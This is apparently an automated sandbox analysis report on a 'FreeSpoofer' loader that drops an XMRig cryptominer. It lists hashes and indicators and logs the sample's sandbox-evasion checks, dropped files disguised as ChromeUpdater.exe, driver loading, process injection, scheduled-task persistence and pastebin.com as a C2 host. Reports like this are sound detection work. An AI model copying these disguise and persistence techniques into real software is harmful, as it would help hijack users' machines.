Analysis
-
max time kernel
149s -
max time network
137s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
18-11-2024 17:48
Static task
static1
Behavioral task
behavioral1
Sample
FreeSpoofer/Loader.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
FreeSpoofer/Loader.exe
Resource
win10v2004-20241007-en
General
-
Target
FreeSpoofer/Loader.exe
-
Size
26.4MB
-
MD5
aec49804a232eb45a7cf41e2dfef37fc
-
SHA1
5cedbd522c3c40305f6d656f57edf9b6a89d7e21
-
SHA256
deb7985a8f9a56f2dcbfdd4c5fa4732daad89ce82733818915f3a4e07c2d3b09
-
SHA512
ad9cf94db9a109e0f3a191169025c4f5ec86aca68937c373380dcb84c728b5817bf5e7bee8eea47b7cb82f5415234ab08a53f26030a5573d574477571f3a3d3d
-
SSDEEP
786432:pfjx8ZSLqcnnTNPefii+ydGI5mM3y9nEDQ:pfadJy9nQQ
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 14 IoCs
description pid Process procid_target PID 2944 created 1228 2944 FZqXSDfqiqeKiuWMMtpFNFZLsGXtEr.exe 21 PID 2944 created 1228 2944 FZqXSDfqiqeKiuWMMtpFNFZLsGXtEr.exe 21 PID 2944 created 1228 2944 FZqXSDfqiqeKiuWMMtpFNFZLsGXtEr.exe 21 PID 2944 created 1228 2944 FZqXSDfqiqeKiuWMMtpFNFZLsGXtEr.exe 21 PID 2940 created 1228 2940 ChromeUpdater.exe 21 PID 2940 created 1228 2940 ChromeUpdater.exe 21 PID 2940 created 1228 2940 ChromeUpdater.exe 21 PID 2940 created 1228 2940 ChromeUpdater.exe 21 PID 988 created 1228 988 UAQXFJzBgwFiiOPhiaEAmXsYiSNzKI.exe 21 PID 988 created 1228 988 UAQXFJzBgwFiiOPhiaEAmXsYiSNzKI.exe 21 PID 988 created 1228 988 UAQXFJzBgwFiiOPhiaEAmXsYiSNzKI.exe 21 PID 988 created 1228 988 UAQXFJzBgwFiiOPhiaEAmXsYiSNzKI.exe 21 PID 2388 created 1228 2388 ChromeUpdater.exe 21 PID 2388 created 1228 2388 ChromeUpdater.exe 21 -
Xmrig family
-
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions Loader.exe -
XMRig Miner payload 10 IoCs
resource yara_rule behavioral1/memory/2940-98-0x000000013F310000-0x000000013FCDA000-memory.dmp xmrig behavioral1/memory/2504-101-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/2504-154-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/2504-174-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/2504-177-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/2388-181-0x000000013F2F0000-0x000000013FCBA000-memory.dmp xmrig behavioral1/memory/2504-183-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/2504-185-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/2504-187-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/2504-189-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig -
pid Process 408 powershell.exe 352 powershell.exe 1068 powershell.exe 1032 powershell.exe 1128 powershell.exe 2164 powershell.exe 768 powershell.exe 1604 powershell.exe -
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\VMware, Inc.\VMware Tools Loader.exe -
Sets service image path in registry 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PbUvSWNrIwxxFLXJuZywfXYMy\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\PbUvSWNrIwxxFLXJuZywfXYMy" HwTEknTZffvlUbHxuLDNsrZCQIGbvd.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\pDUelUFAAewgvNjRtPLTEfnRf\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\pDUelUFAAewgvNjRtPLTEfnRf" ccOxsQVCyPPfMrkxWfrfMnLsWPgAte.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Loader.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Loader.exe -
Executes dropped EXE 8 IoCs
pid Process 2812 HwTEknTZffvlUbHxuLDNsrZCQIGbvd.exe 2600 eBpJzEJRzzexfqXgMaVGflvRQuMBTh.exe 2944 FZqXSDfqiqeKiuWMMtpFNFZLsGXtEr.exe 2940 ChromeUpdater.exe 2360 ccOxsQVCyPPfMrkxWfrfMnLsWPgAte.exe 2752 JTqVhdsyithHueOLWnFrwbBdWWVJVs.exe 988 UAQXFJzBgwFiiOPhiaEAmXsYiSNzKI.exe 2388 ChromeUpdater.exe -
Loads dropped DLL 6 IoCs
pid Process 2288 Loader.exe 2288 Loader.exe 2380 taskeng.exe 2288 Loader.exe 2288 Loader.exe 2380 taskeng.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 5 pastebin.com 4 pastebin.com -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum Loader.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 Loader.exe -
Drops file in System32 directory 8 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2940 set thread context of 2204 2940 ChromeUpdater.exe 82 PID 2940 set thread context of 2504 2940 ChromeUpdater.exe 83 -
Drops file in Program Files directory 4 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\ChromeUpdater.exe FZqXSDfqiqeKiuWMMtpFNFZLsGXtEr.exe File created C:\Program Files\Google\Libs\WR64.sys ChromeUpdater.exe File created C:\Program Files\Google\Chrome\ChromeUpdater.exe UAQXFJzBgwFiiOPhiaEAmXsYiSNzKI.exe File created C:\Program Files\Google\Libs\WR64.sys ChromeUpdater.exe -
Drops file in Windows directory 21 IoCs
description ioc Process File created C:\Windows\SoftwareDistribution\Download\rpoaJiPszTLYVVQHoRiWVwggluplmB.exe Loader.exe File created C:\Windows\SoftwareDistribution\Download\peaUnwdJDqfYGxrvLIkmwIqSvJHpPs.sys Loader.exe File opened for modification C:\Windows\SoftwareDistribution\Download\sOhfCGaIrLanSyRtAcyZkbGaEHckXF.sys Loader.exe File created C:\Windows\Cursors\ZNGvOeeUcshXyEMmfBmjqjqZbSGjyy.sys Loader.exe File opened for modification C:\Windows\Cursors\ZNGvOeeUcshXyEMmfBmjqjqZbSGjyy.sys Loader.exe File opened for modification C:\Windows\Cursors\VeoAqujPmHyNxdVPsglXimurRayeaS.sys Loader.exe File created C:\Windows\Cursors\nquwFtVpDrjedKLcPWlTSybvVrmwMb.exe Loader.exe File created C:\Windows\SoftwareDistribution\Download\AKWKfcGgsOMdkETlGXYaJPQgYsbNqN.sys Loader.exe File created C:\Windows\SoftwareDistribution\Download\lmPSqyuhFhCTtppmzwJiYUsDQWRnbg.sys Loader.exe File opened for modification C:\Windows\SoftwareDistribution\Download\rpoaJiPszTLYVVQHoRiWVwggluplmB.exe Loader.exe File created C:\Windows\SoftwareDistribution\Download\txtyxhSjWBvKFTRDQhpTORfnOyjOCp.exe Loader.exe File opened for modification C:\Windows\SoftwareDistribution\Download\txtyxhSjWBvKFTRDQhpTORfnOyjOCp.exe Loader.exe File created C:\Windows\Cursors\HwTEknTZffvlUbHxuLDNsrZCQIGbvd.exe Loader.exe File opened for modification C:\Windows\SoftwareDistribution\Download\peaUnwdJDqfYGxrvLIkmwIqSvJHpPs.sys Loader.exe File created C:\Windows\SoftwareDistribution\Download\eBpJzEJRzzexfqXgMaVGflvRQuMBTh.exe Loader.exe File created C:\Windows\SoftwareDistribution\Download\tKNZaebxAJeZcodKcXiYvQOzEkfoFm.sys Loader.exe File opened for modification C:\Windows\SoftwareDistribution\Download\tKNZaebxAJeZcodKcXiYvQOzEkfoFm.sys Loader.exe File created C:\Windows\SoftwareDistribution\Download\sOhfCGaIrLanSyRtAcyZkbGaEHckXF.sys Loader.exe File created C:\Windows\Cursors\VeoAqujPmHyNxdVPsglXimurRayeaS.sys Loader.exe File opened for modification C:\Windows\Cursors\nquwFtVpDrjedKLcPWlTSybvVrmwMb.exe Loader.exe File opened for modification C:\Windows\SoftwareDistribution\Download\AKWKfcGgsOMdkETlGXYaJPQgYsbNqN.sys Loader.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 54 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language eBpJzEJRzzexfqXgMaVGflvRQuMBTh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language JTqVhdsyithHueOLWnFrwbBdWWVJVs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
Enumerates system info in registry 2 TTPs 38 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier reg.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\7 reg.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 reg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier reg.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\8 reg.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 reg.exe Set value (str) \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier = "4841653-05866bce-A" reg.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 reg.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 reg.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 reg.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\6 reg.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\8 reg.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\4 reg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Configuration Data reg.exe Key created \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 reg.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\4 reg.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 reg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Configuration Data reg.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 reg.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\2 reg.exe Key created \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 reg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Component Information reg.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\3 reg.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\6 reg.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 reg.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\2 reg.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 reg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier reg.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 reg.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\5 reg.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\9 reg.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\9 reg.exe Set value (str) \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier = "9613114-8d2abece-A" reg.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\7 reg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Component Information reg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier reg.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\3 reg.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\5 reg.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = f06e9643e239db01 powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2964 schtasks.exe 2224 schtasks.exe 1808 schtasks.exe 1608 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2288 Loader.exe 2288 Loader.exe 2600 eBpJzEJRzzexfqXgMaVGflvRQuMBTh.exe 2944 FZqXSDfqiqeKiuWMMtpFNFZLsGXtEr.exe 2944 FZqXSDfqiqeKiuWMMtpFNFZLsGXtEr.exe 2164 powershell.exe 2944 FZqXSDfqiqeKiuWMMtpFNFZLsGXtEr.exe 2944 FZqXSDfqiqeKiuWMMtpFNFZLsGXtEr.exe 408 powershell.exe 2944 FZqXSDfqiqeKiuWMMtpFNFZLsGXtEr.exe 2944 FZqXSDfqiqeKiuWMMtpFNFZLsGXtEr.exe 2944 FZqXSDfqiqeKiuWMMtpFNFZLsGXtEr.exe 2944 FZqXSDfqiqeKiuWMMtpFNFZLsGXtEr.exe 2940 ChromeUpdater.exe 2940 ChromeUpdater.exe 768 powershell.exe 2940 ChromeUpdater.exe 2940 ChromeUpdater.exe 352 powershell.exe 2940 ChromeUpdater.exe 2940 ChromeUpdater.exe 2940 ChromeUpdater.exe 2940 ChromeUpdater.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2288 Loader.exe 2504 explorer.exe 2752 JTqVhdsyithHueOLWnFrwbBdWWVJVs.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 2504 explorer.exe 988 UAQXFJzBgwFiiOPhiaEAmXsYiSNzKI.exe 988 UAQXFJzBgwFiiOPhiaEAmXsYiSNzKI.exe 1604 powershell.exe 2504 explorer.exe 988 UAQXFJzBgwFiiOPhiaEAmXsYiSNzKI.exe 988 UAQXFJzBgwFiiOPhiaEAmXsYiSNzKI.exe 1068 powershell.exe 988 UAQXFJzBgwFiiOPhiaEAmXsYiSNzKI.exe 988 UAQXFJzBgwFiiOPhiaEAmXsYiSNzKI.exe 988 UAQXFJzBgwFiiOPhiaEAmXsYiSNzKI.exe 988 UAQXFJzBgwFiiOPhiaEAmXsYiSNzKI.exe 2504 explorer.exe -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 2812 HwTEknTZffvlUbHxuLDNsrZCQIGbvd.exe 2360 ccOxsQVCyPPfMrkxWfrfMnLsWPgAte.exe -
Suspicious use of AdjustPrivilegeToken 14 IoCs
description pid Process Token: SeDebugPrivilege 2288 Loader.exe Token: SeLoadDriverPrivilege 2812 HwTEknTZffvlUbHxuLDNsrZCQIGbvd.exe Token: SeDebugPrivilege 2600 eBpJzEJRzzexfqXgMaVGflvRQuMBTh.exe Token: SeDebugPrivilege 2164 powershell.exe Token: SeDebugPrivilege 408 powershell.exe Token: SeDebugPrivilege 768 powershell.exe Token: SeDebugPrivilege 352 powershell.exe Token: SeLockMemoryPrivilege 2504 explorer.exe Token: SeLoadDriverPrivilege 2360 ccOxsQVCyPPfMrkxWfrfMnLsWPgAte.exe Token: SeDebugPrivilege 2752 JTqVhdsyithHueOLWnFrwbBdWWVJVs.exe Token: SeDebugPrivilege 1604 powershell.exe Token: SeDebugPrivilege 1068 powershell.exe Token: SeDebugPrivilege 1128 powershell.exe Token: SeDebugPrivilege 1032 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2288 Loader.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2288 wrote to memory of 2812 2288 Loader.exe 32 PID 2288 wrote to memory of 2812 2288 Loader.exe 32 PID 2288 wrote to memory of 2812 2288 Loader.exe 32 PID 2288 wrote to memory of 2600 2288 Loader.exe 35 PID 2288 wrote to memory of 2600 2288 Loader.exe 35 PID 2288 wrote to memory of 2600 2288 Loader.exe 35 PID 2288 wrote to memory of 2600 2288 Loader.exe 35 PID 2600 wrote to memory of 2840 2600 eBpJzEJRzzexfqXgMaVGflvRQuMBTh.exe 37 PID 2600 wrote to memory of 2840 2600 eBpJzEJRzzexfqXgMaVGflvRQuMBTh.exe 37 PID 2600 wrote to memory of 2840 2600 eBpJzEJRzzexfqXgMaVGflvRQuMBTh.exe 37 PID 2600 wrote to memory of 2840 2600 eBpJzEJRzzexfqXgMaVGflvRQuMBTh.exe 37 PID 2840 wrote to memory of 2020 2840 cmd.exe 39 PID 2840 wrote to memory of 2020 2840 cmd.exe 39 PID 2840 wrote to memory of 2020 2840 cmd.exe 39 PID 2840 wrote to memory of 2020 2840 cmd.exe 39 PID 2840 wrote to memory of 1468 2840 cmd.exe 40 PID 2840 wrote to memory of 1468 2840 cmd.exe 40 PID 2840 wrote to memory of 1468 2840 cmd.exe 40 PID 2840 wrote to memory of 1468 2840 cmd.exe 40 PID 2840 wrote to memory of 320 2840 cmd.exe 41 PID 2840 wrote to memory of 320 2840 cmd.exe 41 PID 2840 wrote to memory of 320 2840 cmd.exe 41 PID 2840 wrote to memory of 320 2840 cmd.exe 41 PID 2840 wrote to memory of 1724 2840 cmd.exe 42 PID 2840 wrote to memory of 1724 2840 cmd.exe 42 PID 2840 wrote to memory of 1724 2840 cmd.exe 42 PID 2840 wrote to memory of 1724 2840 cmd.exe 42 PID 2840 wrote to memory of 2284 2840 cmd.exe 43 PID 2840 wrote to memory of 2284 2840 cmd.exe 43 PID 2840 wrote to memory of 2284 2840 cmd.exe 43 PID 2840 wrote to memory of 2284 2840 cmd.exe 43 PID 2840 wrote to memory of 1660 2840 cmd.exe 44 PID 2840 wrote to memory of 1660 2840 cmd.exe 44 PID 2840 wrote to memory of 1660 2840 cmd.exe 44 PID 2840 wrote to memory of 1660 2840 cmd.exe 44 PID 2840 wrote to memory of 1912 2840 cmd.exe 45 PID 2840 wrote to memory of 1912 2840 cmd.exe 45 PID 2840 wrote to memory of 1912 2840 cmd.exe 45 PID 2840 wrote to memory of 1912 2840 cmd.exe 45 PID 2840 wrote to memory of 1900 2840 cmd.exe 46 PID 2840 wrote to memory of 1900 2840 cmd.exe 46 PID 2840 wrote to memory of 1900 2840 cmd.exe 46 PID 2840 wrote to memory of 1900 2840 cmd.exe 46 PID 2840 wrote to memory of 1824 2840 cmd.exe 47 PID 2840 wrote to memory of 1824 2840 cmd.exe 47 PID 2840 wrote to memory of 1824 2840 cmd.exe 47 PID 2840 wrote to memory of 1824 2840 cmd.exe 47 PID 2840 wrote to memory of 988 2840 cmd.exe 48 PID 2840 wrote to memory of 988 2840 cmd.exe 48 PID 2840 wrote to memory of 988 2840 cmd.exe 48 PID 2840 wrote to memory of 988 2840 cmd.exe 48 PID 2840 wrote to memory of 1700 2840 cmd.exe 49 PID 2840 wrote to memory of 1700 2840 cmd.exe 49 PID 2840 wrote to memory of 1700 2840 cmd.exe 49 PID 2840 wrote to memory of 1700 2840 cmd.exe 49 PID 2840 wrote to memory of 328 2840 cmd.exe 50 PID 2840 wrote to memory of 328 2840 cmd.exe 50 PID 2840 wrote to memory of 328 2840 cmd.exe 50 PID 2840 wrote to memory of 328 2840 cmd.exe 50 PID 2840 wrote to memory of 2860 2840 cmd.exe 51 PID 2840 wrote to memory of 2860 2840 cmd.exe 51 PID 2840 wrote to memory of 2860 2840 cmd.exe 51 PID 2840 wrote to memory of 2860 2840 cmd.exe 51 PID 2840 wrote to memory of 1708 2840 cmd.exe 52 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1228
-
C:\Users\Admin\AppData\Local\Temp\FreeSpoofer\Loader.exe"C:\Users\Admin\AppData\Local\Temp\FreeSpoofer\Loader.exe"2⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Loads dropped DLL
- Maps connected drives based on registry
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
